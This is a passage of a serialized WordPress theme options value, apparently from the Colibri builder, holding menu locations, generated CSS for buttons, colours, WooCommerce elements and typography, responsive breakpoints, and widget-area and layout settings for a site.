Menu\";s:8:\"priority\";i:1;}}s:6:\"footer\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";s:8:\"priority\";i:2;}}}s:9:\"locations\";a:5:{i:0;a:2:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";}i:1;a:2:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";}i:2;a:2:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";}i:3;a:2:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";}i:4;a:2:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";}}}s:3:\"css\";s:24448:\"\r\n.h-y-container > *:not(:last-child), .h-x-container-inner > * {\n margin-bottom: 20px;\n}\n.h-x-container-inner, .h-column__content > .h-x-container > *:last-child {\n margin-bottom: -20px;\n}\n.h-x-container-inner > * {\n padding-left: 10px;\n padding-right: 10px;\n}\n.h-x-container-inner {\n margin-left: -10px;\n margin-right: -10px;\n}\n[class*=style-], [class*=local-style-], .h-global-transition, .h-global-transition-all, .h-global-transition-all * {\n transition-duration: 0.5s;\n}\n.wp-block-button .wp-block-button__link:not(.has-background),.wp-block-file .wp-block-file__button {\n background-color: #303e7a;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link:not(.has-background):hover,.wp-block-button .wp-block-button__link:not(.has-background):focus,.wp-block-button .wp-block-button__link:not(.has-background):active,.wp-block-file .wp-block-file__button:hover,.wp-block-file .wp-block-file__button:focus,.wp-block-file .wp-block-file__button:active {\n background-color: rgb(7, 29, 122);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background) {\n color: #303e7a;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):hover,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):focus,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):active {\n color: #fff;\n background-color: #303e7a;\n background-image: none;\n}\n.has-background-color,*[class^=\"wp-block-\"].is-style-solid-color {\n background-color: #303e7a;\n background-image: none;\n}\n.has-colibri-color-1-background-color {\n background-color: #303e7a;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color {\n background-color: #303e7a;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:active {\n background-color: rgb(7, 29, 122);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color {\n color: #303e7a;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #303e7a;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:active {\n color: #fff;\n background-color: #303e7a;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-1-background-color,*[class^=\"wp-block-\"] .has-colibri-color-1-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color p {\n background-color: #303e7a;\n background-image: none;\n}\n.has-colibri-color-1-color {\n color: #303e7a;\n}\n.has-colibri-color-2-background-color {\n background-color: #f7e597;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color {\n background-color: #f7e597;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:active {\n background-color: rgb(162, 150, 99);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color {\n color: #f7e597;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #f7e597;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #f7e597;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #f7e597;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #f7e597;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:active {\n color: #fff;\n background-color: #f7e597;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-2-background-color,*[class^=\"wp-block-\"] .has-colibri-color-2-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color p {\n background-color: #f7e597;\n background-image: none;\n}\n.has-colibri-color-2-color {\n color: #f7e597;\n}\n.has-colibri-color-3-background-color {\n background-color: #f66161;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color {\n background-color: #f66161;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:active {\n background-color: rgb(161, 63, 63);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color {\n color: #f66161;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #f66161;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #f66161;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #f66161;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #f66161;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:active {\n color: #fff;\n background-color: #f66161;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-3-background-color,*[class^=\"wp-block-\"] .has-colibri-color-3-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color p {\n background-color: #f66161;\n background-image: none;\n}\n.has-colibri-color-3-color {\n color: #f66161;\n}\n.has-colibri-color-4-background-color {\n background-color: #9ec9e2;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color {\n background-color: #9ec9e2;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:active {\n background-color: rgb(7, 146, 226);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color {\n color: #9ec9e2;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #9ec9e2;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #9ec9e2;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #9ec9e2;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #9ec9e2;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:active {\n color: #fff;\n background-color: #9ec9e2;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-4-background-color,*[class^=\"wp-block-\"] .has-colibri-color-4-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color p {\n background-color: #9ec9e2;\n background-image: none;\n}\n.has-colibri-color-4-color {\n color: #9ec9e2;\n}\n.has-colibri-color-5-background-color {\n background-color: #f6f8fa;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color {\n background-color: #f6f8fa;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:active {\n background-color: rgb(162, 164, 165);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color {\n color: #f6f8fa;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #f6f8fa;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #f6f8fa;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #f6f8fa;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #f6f8fa;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:active {\n color: #fff;\n background-color: #f6f8fa;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-5-background-color,*[class^=\"wp-block-\"] .has-colibri-color-5-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color p {\n background-color: #f6f8fa;\n background-image: none;\n}\n.has-colibri-color-5-color {\n color: #f6f8fa;\n}\n.has-colibri-color-6-background-color {\n background-color: #202a54;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color {\n background-color: #202a54;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:active {\n background-color: rgb(32, 42, 84);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color {\n color: #202a54;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #202a54;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #202a54;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #202a54;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #202a54;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:active {\n color: #fff;\n background-color: #202a54;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-6-background-color,*[class^=\"wp-block-\"] .has-colibri-color-6-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color p {\n background-color: #202a54;\n background-image: none;\n}\n.has-colibri-color-6-color {\n color: #202a54;\n}\n#colibri .woocommerce-store-notice,#colibri.woocommerce .content .h-section input[type=submit],#colibri.woocommerce-page .content .h-section input[type=button],#colibri.woocommerce .content .h-section input[type=button],#colibri.woocommerce-page .content .h-section .button,#colibri.woocommerce .content .h-section .button,#colibri.woocommerce-page .content .h-section a.button,#colibri.woocommerce .content .h-section a.button,#colibri.woocommerce-page .content .h-section button.button,#colibri.woocommerce .content .h-section button.button,#colibri.woocommerce-page .content .h-section input.button,#colibri.woocommerce .content .h-section input.button,#colibri.woocommerce-page .content .h-section input#submit,#colibri.woocommerce .content .h-section input#submit,#colibri.woocommerce-page .content .h-section a.added_to_cart,#colibri.woocommerce .content .h-section a.added_to_cart,#colibri.woocommerce-page .content .h-section .ui-slider-range,#colibri.woocommerce .content .h-section .ui-slider-range,#colibri.woocommerce-page .content .h-section .ui-slider-handle,#colibri.woocommerce .content .h-section .ui-slider-handle {\n background-color: #303e7a;\n background-image: none;\n border-top-width: 0px;\n border-top-color: #303e7a;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #303e7a;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: #303e7a;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #303e7a;\n border-left-style: solid;\n}\n#colibri .woocommerce-store-notice:hover,#colibri .woocommerce-store-notice:focus,#colibri .woocommerce-store-notice:active,#colibri.woocommerce .content .h-section input[type=submit]:hover,#colibri.woocommerce .content .h-section input[type=submit]:focus,#colibri.woocommerce .content .h-section input[type=submit]:active,#colibri.woocommerce-page .content .h-section input[type=button]:hover,#colibri.woocommerce-page .content .h-section input[type=button]:focus,#colibri.woocommerce-page .content .h-section input[type=button]:active,#colibri.woocommerce .content .h-section input[type=button]:hover,#colibri.woocommerce .content .h-section input[type=button]:focus,#colibri.woocommerce .content .h-section input[type=button]:active,#colibri.woocommerce-page .content .h-section .button:hover,#colibri.woocommerce-page .content .h-section .button:focus,#colibri.woocommerce-page .content .h-section .button:active,#colibri.woocommerce .content .h-section .button:hover,#colibri.woocommerce .content .h-section .button:focus,#colibri.woocommerce .content .h-section .button:active,#colibri.woocommerce-page .content .h-section a.button:hover,#colibri.woocommerce-page .content .h-section a.button:focus,#colibri.woocommerce-page .content .h-section a.button:active,#colibri.woocommerce .content .h-section a.button:hover,#colibri.woocommerce .content .h-section a.button:focus,#colibri.woocommerce .content .h-section a.button:active,#colibri.woocommerce-page .content .h-section button.button:hover,#colibri.woocommerce-page .content .h-section button.button:focus,#colibri.woocommerce-page .content .h-section button.button:active,#colibri.woocommerce .content .h-section button.button:hover,#colibri.woocommerce .content .h-section button.button:focus,#colibri.woocommerce .content .h-section button.button:active,#colibri.woocommerce-page .content .h-section input.button:hover,#colibri.woocommerce-page .content .h-section input.button:focus,#colibri.woocommerce-page .content .h-section input.button:active,#colibri.woocommerce .content .h-section input.button:hover,#colibri.woocommerce .content .h-section input.button:focus,#colibri.woocommerce .content .h-section input.button:active,#colibri.woocommerce-page .content .h-section input#submit:hover,#colibri.woocommerce-page .content .h-section input#submit:focus,#colibri.woocommerce-page .content .h-section input#submit:active,#colibri.woocommerce .content .h-section input#submit:hover,#colibri.woocommerce .content .h-section input#submit:focus,#colibri.woocommerce .content .h-section input#submit:active,#colibri.woocommerce-page .content .h-section a.added_to_cart:hover,#colibri.woocommerce-page .content .h-section a.added_to_cart:focus,#colibri.woocommerce-page .content .h-section a.added_to_cart:active,#colibri.woocommerce .content .h-section a.added_to_cart:hover,#colibri.woocommerce .content .h-section a.added_to_cart:focus,#colibri.woocommerce .content .h-section a.added_to_cart:active,#colibri.woocommerce-page .content .h-section .ui-slider-range:hover,#colibri.woocommerce-page .content .h-section .ui-slider-range:focus,#colibri.woocommerce-page .content .h-section .ui-slider-range:active,#colibri.woocommerce .content .h-section .ui-slider-range:hover,#colibri.woocommerce .content .h-section .ui-slider-range:focus,#colibri.woocommerce .content .h-section .ui-slider-range:active,#colibri.woocommerce-page .content .h-section .ui-slider-handle:hover,#colibri.woocommerce-page .content .h-section .ui-slider-handle:focus,#colibri.woocommerce-page .content .h-section .ui-slider-handle:active,#colibri.woocommerce .content .h-section .ui-slider-handle:hover,#colibri.woocommerce .content .h-section .ui-slider-handle:focus,#colibri.woocommerce .content .h-section .ui-slider-handle:active {\n background-color: rgb(7, 29, 122);\n background-image: none;\n border-top-width: 0px;\n border-top-color: rgb(7, 29, 122);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(7, 29, 122);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(7, 29, 122);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(7, 29, 122);\n border-left-style: solid;\n}\n#colibri.woocommerce-page .content .h-section .star-rating::before,#colibri.woocommerce .content .h-section .star-rating::before,#colibri.woocommerce-page .content .h-section .star-rating span::before,#colibri.woocommerce .content .h-section .star-rating span::before {\n color: #303e7a;\n}\n#colibri.woocommerce-page .content .h-section .price,#colibri.woocommerce .content .h-section .price {\n color: #303e7a;\n}\n#colibri.woocommerce-page .content .h-section .price del,#colibri.woocommerce .content .h-section .price del {\n color: rgb(89, 95, 122);\n}\n#colibri.woocommerce-page .content .h-section .onsale,#colibri.woocommerce .content .h-section .onsale {\n background-color: #303e7a;\n background-image: none;\n}\n#colibri.woocommerce-page .content .h-section .onsale:hover,#colibri.woocommerce-page .content .h-section .onsale:focus,#colibri.woocommerce-page .content .h-section .onsale:active,#colibri.woocommerce .content .h-section .onsale:hover,#colibri.woocommerce .content .h-section .onsale:focus,#colibri.woocommerce .content .h-section .onsale:active {\n background-color: rgb(7, 29, 122);\n background-image: none;\n}\n#colibri.woocommerce ul.products li.product h2:hover {\n color: #303e7a;\n}\n#colibri.woocommerce-page .content .h-section .woocommerce-pagination .page-numbers.current,#colibri.woocommerce .content .h-section .woocommerce-pagination .page-numbers.current,#colibri.woocommerce-page .content .h-section .woocommerce-pagination a.page-numbers:hover,#colibri.woocommerce .content .h-section .woocommerce-pagination a.page-numbers:hover {\n background-color: #303e7a;\n background-image: none;\n}\n#colibri.woocommerce-page .content .h-section .comment-form-rating .stars a,#colibri.woocommerce .content .h-section .comment-form-rating .stars a {\n color: #303e7a;\n}\n.h-section-global-spacing {\n padding-top: 90px;\n padding-bottom: 90px;\n}\n#colibri .colibri-language-switcher {\n background-color: white;\n background-image: none;\n top: 80px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 4px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 4px;\n border-bottom-right-radius: 0px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .colibri-language-switcher .lang-item {\n padding-top: 14px;\n padding-right: 18px;\n padding-bottom: 14px;\n padding-left: 18px;\n}\nbody {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(64, 85, 169);\n}\nbody a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 1em;\n line-height: 1.5;\n color: #03a9f4;\n}\nbody p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(64, 85, 169);\n}\nbody .h-lead p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 1.25em;\n line-height: 1.5;\n color: rgb(60, 65, 84);\n}\nbody blockquote p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(64, 85, 169);\n}\nbody h1 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 3.375em;\n line-height: 1.26;\n color: rgb(32, 42, 84);\n}\nbody h2 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 2.625em;\n line-height: 1.143;\n color: rgb(32, 42, 84);\n}\nbody h3 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 2.25em;\n line-height: 1.25;\n color: rgb(32, 42, 84);\n}\nbody h4 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.25em;\n line-height: 1.6;\n color: rgb(32, 42, 84);\n}\nbody h5 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.125em;\n line-height: 1.55;\n color: rgb(32, 42, 84);\n}\nbody h6 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1em;\n line-height: 1.6;\n color: rgb(32, 42, 84);\n}\n .content.colibri-main-content-single .main-section,.content.colibri-main-content-archive .main-section {\n padding-top: 90px;\n padding-bottom: 90px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 25% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 25%;\n}\n\r\n\r\n@media (min-width: 768px) and (max-width: 1023px){\r\n.h-section-global-spacing {\n padding-top: 60px;\n padding-bottom: 60px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 33.33% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 33.33%;\n}\n\r\n}\n\r\n@media (max-width: 767px){\r\n.h-section-global-spacing {\n padding-top: 30px;\n padding-bottom: 30px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 100%;\n}\n\r\n}\n\";s:6:\"medias\";a:3:{s:7:\"desktop\";a:6:{s:2:\"id\";s:7:\"desktop\";s:5:\"label\";s:7:\"desktop\";s:4:\"icon\";s:15:\"desktop_windows\";s:4:\"show\";b:1;s:4:\"main\";b:1;s:10:\"gridPrefix\";s:2:\"lg\";}s:6:\"tablet\";a:7:{s:2:\"id\";s:6:\"tablet\";s:5:\"label\";s:6:\"tablet\";s:4:\"icon\";s:14:\"tablet_android\";s:4:\"show\";b:0;s:5:\"width\";i:1024;s:10:\"gridPrefix\";s:2:\"md\";s:5:\"query\";s:49:\"@media (min-width: 768px) and (max-width: 1023px)\";}s:6:\"mobile\";a:6:{s:2:\"id\";s:6:\"mobile\";s:5:\"label\";s:6:\"mobile\";s:4:\"icon\";s:13:\"phone_android\";s:4:\"show\";b:0;s:5:\"width\";i:480;s:5:\"query\";s:25:\"@media (max-width: 767px)\";}}s:8:\"defaults\";a:1:{s:8:\"partials\";a:4:{s:7:\"sidebar\";a:8:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:43;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:46;s:15:\"archive_product\";i:-1;}s:6:\"header\";a:8:{s:10:\"front_page\";i:22;s:4:\"page\";i:-1;s:4:\"post\";i:25;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:6:\"footer\";a:8:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:28;s:12:\"archive_post\";i:-1;s:12:\"staff-member\";i:-1;s:20:\"archive_staff-member\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:4:\"main\";a:6:{i:404;i:37;s:4:\"post\";i:31;s:7:\"archive\";i:34;s:15:\"archive_product\";i:1732;s:7:\"product\";i:1729;s:6:\"search\";i:40;}}}s:12:\"widget_areas\";a:10:{s:20:\"header-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Header widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Header widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Header widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"header\";}s:21:\"content-widget-area-1\";a:3:{s:4:\"name\";s:21:\"In page widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-2\";a:3:{s:4:\"name\";s:21:\"In page widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-3\";a:3:{s:4:\"name\";s:21:\"In page widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:7:\"content\";}s:20:\"footer-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Footer widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Footer widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Footer widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-4\";a:3:{s:4:\"name\";s:20:\"Footer widget area 4\";s:5:\"index\";i:4;s:4:\"type\";s:6:\"footer\";}}s:8:\"imported\";a:10:{s:18:\"theme_default_data\";b:1;s:17:\"header/front_page\";b:1;s:11:\"header/post\";b:1;s:11:\"footer/post\";b:1;s:9:\"main/post\";b:1;s:12:\"main/archive\";b:1;s:8:\"main/404\";b:1;s:11:\"main/search\";b:1;s:12:\"sidebar/post\";b:1;s:15:\"sidebar/product\";b:1;}s:4:\"urls\";a:2:{s:19:\"colibri_uploads_url\";s:47:\"https://gsudice.dataconn.net/wp-content/uploads\";s:16:\"colibri_home_url\";s:29:\"https://gsudice.dataconn.net/\";}s:14:\"cssByPartialId\";a:18:{i:22;a:8:{s:12:\"local-22-h26\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h26-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h26-outer {\n width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h26-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h29\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h29-outer {\n width: 50% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h29-outer {\n width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h29-outer {\n width: 100% ;\n}\n\";}s:12:\"local-22-h30\";a:1:{s:7:\"desktop\";s:0:\"\";}s:11:\"local-22-h4\";a:2:{s:7:\"desktop\";s:112:\"#colibri .style-local-22-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:73:\"#colibri .style-local-22-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-22-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-22-h6-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";}s:11:\"local-22-h7\";a:1:{s:7:\"desktop\";s:112:\"#colibri .style-local-22-h7-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";}s:12:\"local-22-h13\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-22-h13-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h13-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h16\";a:2:{s:7:\"desktop\";s:93:\"#colibri .style-local-22-h16-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h16-outer {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n\";}}i:25;a:6:{s:11:\"local-25-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n width: auto;\n max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-25-h4-outer {\n flex: 1 1 0;\n -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri 